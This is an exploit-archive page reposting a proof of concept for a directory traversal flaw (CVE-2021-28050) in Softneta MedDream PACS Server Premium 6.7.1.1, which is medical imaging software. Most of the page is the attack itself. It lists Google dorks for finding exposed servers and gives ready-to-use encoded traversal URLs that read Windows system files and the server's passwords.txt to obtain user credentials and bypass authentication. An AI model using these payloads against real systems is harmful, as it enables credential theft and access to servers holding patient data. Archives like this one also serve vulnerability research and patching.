Advertisement






Softneta MedDream PACS Server Premium 6.7.1.1 Directory Traversal

CVE Category Price Severity
CVE-2021-28050 CWE-22 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2018-09-08
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018090075

Below is a copy:

Softneta MedDream PACS Server Premium 6.7.1.1 Directory Traversal
# Exploit Title: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
# Date: 2018-05-23
# Software Link: https://www.softneta.com/products/meddream-pacs-server/downloads.html
# Google Dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
# Version: MedDream PACS Server Premium 6.7.1.1
# Category: webapps
# Tested on: Windows 7 
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt
   
# Proof of Concept
 
http://TARGET/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
 
http://TARGET/Pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows\System32\drivers\etc\hosts
 
http://TARGET/Pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c\MedDreamPACS-Premium\passwords.txt (Attack Vector, obtain private information from users and passwords -Bypass Authentication- )


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum